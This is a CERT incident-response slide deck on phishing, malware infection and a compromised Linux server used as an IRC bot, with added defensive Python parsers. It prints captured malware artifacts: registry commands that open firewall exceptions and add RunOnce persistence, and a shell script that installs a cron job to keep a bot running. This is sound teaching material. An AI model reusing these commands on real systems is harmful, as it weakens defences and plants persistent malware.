2012 Sample network incidents (Vzorčni primeri omrežnih incidentov)


A few examples of security incidents handled on the internet.


  1. Sample network incidents, tadej@cert.si
  2. Copyright Carnegie Mellon University
  3. Give a man a stolen credit card and he will eat like a king for a day. Teach him how to fish (phish) and he will be set for life. -- ancient Nigerian proverb
  4. Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDT
     X-Mailer: YahooMailWebService/0.8.117.340979
     References: <1333964698.56162.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333964778.34343.YahooMailNeo@web141001.mail.bf1.yahoo.com>
       <1333964865.49465.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333964990.45879.YahooMailNeo@web141003.mail.bf1.yahoo.com>
       <1333965126.47512.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965576.34205.YahooMailNeo@web141001.mail.bf1.yahoo.com>
       <1333965781.74493.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333965883.95604.YahooMailNeo@web141006.mail.bf1.yahoo.com>
       <1333966100.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966284.12608.YahooMailNeo@web141002.mail.bf1.yahoo.com>
       <1333966541.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966617.34414.YahooMailNeo@web141001.mail.bf1.yahoo.com>
       <1333966670.88285.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966816.85842.YahooMailNeo@web141006.mail.bf1.yahoo.com>
       <1333968605.76830.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333968944.99197.YahooMailNeo@web141002.mail.bf1.yahoo.com>
       <1333969055.16421.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969203.18144.YahooMailNeo@web141005.mail.bf1.yahoo.com>
       <1333969409.27611.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969499.38548.YahooMailNeo@web141006.mail.bf1.yahoo.com>
       <1333969533.98850.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333969617.82064.YahooMailNeo@web141001.mail.bf1.yahoo.com>
       <1333969837.16102.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333970999.36974.YahooMailNeo@web141006.mail.bf1.yahoo.com>
       <1333971076.45397.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333971331.18898.YahooMailNeo@web141003.mail.bf1.yahoo.com>
       <1333976214.9952.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>
     Message-ID: <1334171740.94092.YahooMailNeo@web141006.mail.bf1.yahoo.com>
     Date: Wed, 11 Apr 2012 12:15:40 -0700 (PDT)
     From: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>
     Reply-To: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>
     Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?=
       =?utf-8?B?KQ==?=
     To: "xxxxxx.xxxxx@xxxxx.si"
     Cc: xxxxx.xxxx@siol.net
     In-Reply-To: <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>
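An added example, not from the deck, of reading a header block like the one above: it unfolds the fields, decodes the RFC 2047 encoded Subject and pulls the client address out of the first-hop Received line. The sample header is constructed from the slide with its xxx masking kept.

```python
import base64
import quopri
import re

# Constructed sample modelled on the slide (same xxx masking); the Subject is
# folded over two lines the way a mail server would write it.
SAMPLE_HEADERS = """\
Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDT
From: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com>
Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?=
 =?utf-8?B?KQ==?=
To: "xxxxxx.xxxxx@xxxxx.si"
"""
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([BbQq])\?([^?]*)\?=")

def unfold_headers(raw):
    """Split a raw header block into (name, value) pairs, joining folded lines."""
    fields = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:              # continuation line
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            fields.append((name.strip(), value.strip()))
    return fields

def decode_rfc2047(value):
    """Decode RFC 2047 encoded-words (B and Q) into readable text."""
    value = re.sub(r"\?=\s+=\?", "?==?", value)   # space between two encoded-words is not content
    def decode_word(m):
        charset, enc, text = m.group(1), m.group(2).upper(), m.group(3)
        raw = (base64.b64decode(text) if enc == "B"
               else quopri.decodestring(text.encode("ascii"), header=True))
        return raw.decode(charset, errors="replace")
    return ENCODED_WORD.sub(decode_word, value)

def triage(raw):
    """What an analyst reads first: decoded subject, originating hop, submission path."""
    fields = unfold_headers(raw)
    get = lambda n: next((v for k, v in fields if k.lower() == n), "")
    received = [v for k, v in fields if k.lower() == "received"]
    first_hop = received[-1] if received else ""    # bottom-most Received = first hop
    origin = re.search(r"from \[([^\]]+)\]", first_hop)
    return {
        "subject": decode_rfc2047(get("subject")),
        "origin_ip": origin.group(1) if origin else None,
        "webmail": "via HTTP" in first_hop,          # submitted through a webmail session
    }
```

The decoded Subject reads "Fw: finančna kartica ( računovodska služba)", i.e. "Fw: financial card (accounting department)", which is the lure the rest of the deck follows.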
  5. Operation: Process Create   Result: SUCCESS
     Command line: "C:\Program Files\SumatraPDF\SumatraPDF.exe" "C:\Documents and Settings\tt\Application Data\navodila_pogodba_ePOBOT_AJPES.pdf"
  6. cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f
     cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\svchost.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\svchost.exe:*:Enabled:Windows Messanger" /f
     cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\Svchost32.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\Svchost32.exe:*:Enabled:Windows Messanger" /f
     "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + "IeXplorer32" "C:\Users\User\AppData\Roaming\Prometna_Kartica_Apr2012.exe"
  7. $ whois 178.172.xxx.xxx
     inetnum:   178.172.xxx.0 - 178.172.xxx.255
     netname:   ARNES-NET
     descr:     Academic and Research Network of Slovenia
     descr:     Ljubljana
     descr:     Slovenia
  8. # netstat -anpt | more
     ...
     178.172.xxx.xxx:44947  178.17.86.40:22    SYN_SENT  -
     178.172.xxx.xxx:40448  178.17.86.42:22    SYN_SENT  -
     178.172.xxx.xxx:47351  178.17.86.35:22    SYN_SENT  -
     178.172.xxx.xxx:57112  178.17.85.142:22   SYN_SENT  -
     178.172.xxx.xxx:44947  178.17.86.48:22    SYN_SENT  -
     178.172.xxx.xxx:40448  178.17.86.242:22   SYN_SENT  -
     178.172.xxx.xxx:47351  178.17.86.135:22   SYN_SENT  -
     178.172.xxx.xxx:57112  178.17.85.12:22    SYN_SENT  -
     178.172.xxx.xxx:44947  178.17.86.50:22    SYN_SENT  -
     178.172.xxx.xxx:40448  178.17.86.92:22    SYN_SENT  -
     178.172.xxx.xxx:47351  178.17.86.25:22    SYN_SENT  -
     178.172.xxx.xxx:57112  178.17.85.122:22   SYN_SENT  -
     ...
  9. # netstat -anpt | more
     ...
     178.172.xxx.xxx:48174  208.83.20.130:6667    ESTABLISHED  5472/-bash
     178.172.xxx.xxx:57221  194.109.20.90:6667    ESTABLISHED  5472/-bash
     178.172.xxx.xxx:34110  195.197.175.21:7000   ESTABLISHED  5472/-bash
     ...
     $ dig -x 208.83.20.130
     130.20.83.208.in-addr.arpa.   195    IN  PTR  Tampa.FL.US.Undernet.org.
     90.20.109.194.in-addr.arpa.   86400  IN  PTR  undernet.xs4all.nl.
     21.175.197.195.in-addr.arpa.  14400  IN  PTR  irc2.saunalahti.fi.
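An added example, not from the deck, that mechanises what slides 8 and 9 show by eye: a fan-out of half-open connections to port 22 on many hosts (outbound scanning) and established sessions to IRC ports held by a process calling itself -bash. The input is a constructed `netstat -anpt` listing built from the slide lines, with their masking kept, plus one ordinary listening socket.

```python
from collections import defaultdict

IRC_PORTS = {6667, 6668, 6669, 7000}
SCAN_THRESHOLD = 8      # distinct peers in SYN_SENT towards one port
# Constructed sample in `netstat -anpt` layout, built from the lines on the
# slides (same xxx masking) plus one ordinary listening socket.
SAMPLE_NETSTAT = """\
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1234/sshd
tcp 0 1 178.172.xxx.xxx:44947 178.17.86.40:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:40448 178.17.86.42:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:47351 178.17.86.35:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:57112 178.17.85.142:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:44947 178.17.86.48:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:40448 178.17.86.242:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:47351 178.17.86.135:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:57112 178.17.85.12:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:44947 178.17.86.50:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:40448 178.17.86.92:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:47351 178.17.86.25:22 SYN_SENT -
tcp 0 1 178.172.xxx.xxx:57112 178.17.85.122:22 SYN_SENT -
tcp 0 0 178.172.xxx.xxx:48174 208.83.20.130:6667 ESTABLISHED 5472/-bash
tcp 0 0 178.172.xxx.xxx:57221 194.109.20.90:6667 ESTABLISHED 5472/-bash
tcp 0 0 178.172.xxx.xxx:34110 195.197.175.21:7000 ESTABLISHED 5472/-bash
"""

def parse_netstat(text):
    """Return (remote_ip, remote_port, state, pid/program) per non-listening tcp socket."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] != "tcp" or f[5] == "LISTEN":
            continue
        rip, rport = f[4].rsplit(":", 1)
        rows.append((rip, int(rport), f[5], f[6] if len(f) > 6 else "-"))
    return rows

def find_scans(rows, threshold=SCAN_THRESHOLD):
    """Ports with half-open connections fanning out to many distinct hosts."""
    peers = defaultdict(set)
    for rip, rport, state, _ in rows:
        if state == "SYN_SENT":
            peers[rport].add(rip)
    return {port: len(hosts) for port, hosts in peers.items() if len(hosts) >= threshold}

def find_irc(rows):
    """Established sessions to IRC ports with the owning process; a login-shell
    style name such as '-bash' on a network socket is itself a red flag."""
    return sorted({(rip, rport, prog) for rip, rport, state, prog in rows
                   if state == "ESTABLISHED" and rport in IRC_PORTS})
```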
  10. # lsof -np 5472
      ...
      -bash  5472  root  txt  REG  8,1  35352  /var/spool/samba/.bash/-bash
      ...
  11. # file /var/spool/samba/.bash/*
      ./autorun:      POSIX shell script text executable
      ./-bash:        ELF 32-bit LSB executable, Intel 80386, version
      ./cron.d:       ASCII text
      ./cyc.acc:      ASCII text
      ./cyc.hold:     a /usr/bin/perl script text executable
      ./cyc.pid:      ASCII text
      ./cyc.session:  ASCII text
      ./cyc.set:      ASCII English text
      ./go:           ASCII text
      ./mech.dir:     ASCII text
      ./m.help:       data
      ./pico:         ELF 32-bit LSB executable, Intel 80386, version 1
      ./run:          POSIX shell script text executable
      ./stealth:      ELF 32-bit LSB executable, Intel 80386, version 1
      ./update:       POSIX shell script text executable
  12. $ cat /var/spool/samba/.bash/autorun
      #!/bin/sh
      pwd > mech.dir
      dir=$(cat mech.dir)
      echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
      crontab cron.d && perl cyc.hold
      crontab -l | grep update
      echo "#!/bin/sh
      if test -r $dir/cyc.pid; then
        pid=$(cat $dir/cyc.pid)
        if $(kill -CHLD $pid >/dev/null 2>&1); then
          exit 0
        fi
      fi
      cd $dir
      rm -rf cyc.hold
      ./run &>/dev/null" > update
      chmod u+x update
  13. $ grep Accepted secure
      May 4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 193.2.xxx.xxx port 60429 ssh2
      May 4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 193.2.xxx.xxx port 60438 ssh2
      May 4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2
      May 4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2
      May 4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2
      May 5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2
      May 5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2
      May 5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2
      May 5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2
      May 5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2
  14. Now talking on #xhack
      * Topic for #xhack is: ./a 178.17;./a 201.251;./a 195.76;./a 195.248;./a 81.211 129.25 128.32 144.30 134.50
      * Topic for #xhack set by BaRoZ at Sun May 01 16:21:28 2011
      ...
      <BaRoZ> nuf1f_ say a
      <BaRoZ> nuf1f_ say a
      <BaRoZ> +kb nuf1f_
      * start__ sets ban on *!*userr@194.249.*.*
      >
      >
      * You have been kicked from #xhack by start__ (Requested Kick)
  15. * /who #xhack
      * #xhack ~Fly 178.172.xxx.xxx *.undernet.org sasesase H :3 Powerd by move
      * #xhack ~Fly 124.82.70.197 *.undernet.org informati H@ :3 Powerd by move
      * #xhack ~Fly 121.241.77.194 *.undernet.org luccc H@ :3 Powerd by move
      * #xhack ~Fly biophys3.physics.usyd.edu.au *.undernet.org biophys3 H@ :3 Powerd by move
      * #xhack ~chattr 218.189.204.215 *.undernet.org DHL H@ :3 chattr
      * #xhack ~Fly 93-44-208-192.ip98.fastwebnet.it *.undernet.org valy____ H@ :3 Powerd by move
      * #xhack ~lolipop 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org part_ H@ :3 lolipop
      * #xhack ~lolipop Edd.users.undernet.org *.undernet.org valyca H@x :3 lolipop
      * #xhack ~luzar MService.users.undernet.org *.undernet.org VaLi H@x :3 luser
      * #xhack ~alpha 62.94.13.227 *.undernet.org vali__ H@ :3 omega
      * #xhack ~circ 82.193.22.182 *.undernet.org start__ H@ :3 circ
      * #xhack ~chattr 82.193.22.182 *.undernet.org start___ H@ :3 chattr
      * #xhack ~circ 122.99.166.142 *.undernet.org removed__ H@ :3 circ
      * #xhack ~Fly 80.82.17.151 *.undernet.org xHaCk H@ :3 Powerd by move
      * #xhack ~lolipop a83-161-134-137.adsl.xs4all.nl *.undernet.org valyca__ H@ :3 lolipop
      * #xhack ~circ a83-161-134-137.adsl.xs4all.nl *.undernet.org removed H@ :3 circ
      * #xhack ~chattr a83-161-134-137.adsl.xs4all.nl *.undernet.org moved H@ :3 chattr
      * #xhack ~circ 62.94.13.227 *.undernet.org VaLi_ H@ :3 circ
      * #xhack ~lolipop 82.193.22.182 *.undernet.org start_ H@ :3 lolipop
      * #xhack ~lolipop 190.114.224.11 *.undernet.org valyca_ H@ :3 lolipop
      * #xhack ~chattr 122.99.166.142 *.undernet.org VaLy___ H@ :3 chattr
      * #xhack ~circ 190.114.224.11 *.undernet.org removed_ H@ :3 circ
      * #xhack ~VaLy hax0r.users.undernet.org *.undernet.org BaRoZ H@x :3 VaLy
      * #xhack ~Aly 50.16.26.202 *.undernet.org gzip H@ :3 Powerd by move
      * #xhack ~chattr 190.114.224.11 *.undernet.org moved_ H@ :3 chattr
      * #xhack ~UK mail.pjsind.co.uk *.undernet.org part____ H@ :3 Powerd by move
      * #xhack ~circ Ezl.users.undernet.org *.undernet.org valentin H@x :3 circ
      * #xhack ~bursuc sd-23267.dedibox.fr *.undernet.org VaLy_ H@ :3 Powerd by move
      * #xhack ~lolipop 122.99.166.142 *.undernet.org valyca___ H@ :3 lolipop
      * #xhack ~Fly 88.191.129.21 *.undernet.org Valeriu H@ :3 Powerd by move
      * #xhack ~Fly 46.28.110.179 *.undernet.org pizdel H@ :3 Powerd by move
      * #xhack ~Kitty xray426.server4you.de *.undernet.org move H@ :3 Powerd by move
      * #xhack ~Fly v-182-163-56-103.ub-freebit.net *.undernet.org valy_____ H@ :3 Powerd by move
      * #xhack ~chattr 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org cUc H@ :3 chattr
      * #xhack :End of /WHO list.
  16. # find / -ctime -10 -print
      # ps -ef
      # find / -mtime -5 -ls
      # lsof -np PID
      # find / -amin -120 -print
      # lsof -ni TCP:22
      # stat somefile
      # pstree -aAp
      # cat .bash_history
      # last -i
      # ls -la
      # file somefile.bin
      # ls -lct
      # strings somefile.bin
      # ls -l /proc/PID/
      # chkrootkit
      # rkhunter